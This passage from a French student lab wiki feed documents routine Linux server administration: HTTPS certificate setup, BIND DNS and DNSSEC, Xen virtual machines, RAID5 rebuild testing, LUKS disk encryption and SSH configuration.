 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.179&lt;br /&gt;
 www     IN      A       193.48.57.179&lt;br /&gt;
 @       IN      A       193.48.57.179&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
 search banane.space&lt;br /&gt;
 nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
 /etc/bind/banane.space.dnssec# ls&lt;br /&gt;
 ????&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
 dnssec-signzone -o banane.space -k banane.space-ksk &lt;br /&gt;
 ../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous créons trois nouvelles partitions qui vont représenter nos disques.&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ces partitions dans la machine virtuelle via le fichier IMA5-BANANE.conf&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On installe mdadm dans notre MV&lt;br /&gt;
&lt;br /&gt;
    apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
 root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
 root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine. On constaste que la premiere partition a été &amp;quot;removed&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
 raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour remettre la partition dans le raid5 il faut taper la commande suivante&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau et création de conteneurs sous Machine Virtuelle Linux&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=46351</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=46351"/>
				<updated>2017-11-17T13:58:29Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : Annulation des modifications 46348 de Hdelatte (discussion)&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=GreenArrow --ip=193.48.57.162 --netmask=255.255.255.240 --gateway=193.48.57.172&lt;br /&gt;
  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Modification du fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-home -v&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-var -v&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-home,xvdc,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-var,xvdb,w',&lt;br /&gt;
              ]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
xl create /etc/xen/GreenArrow.cfg&lt;br /&gt;
ssh username@weppes&lt;br /&gt;
ssh root@193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
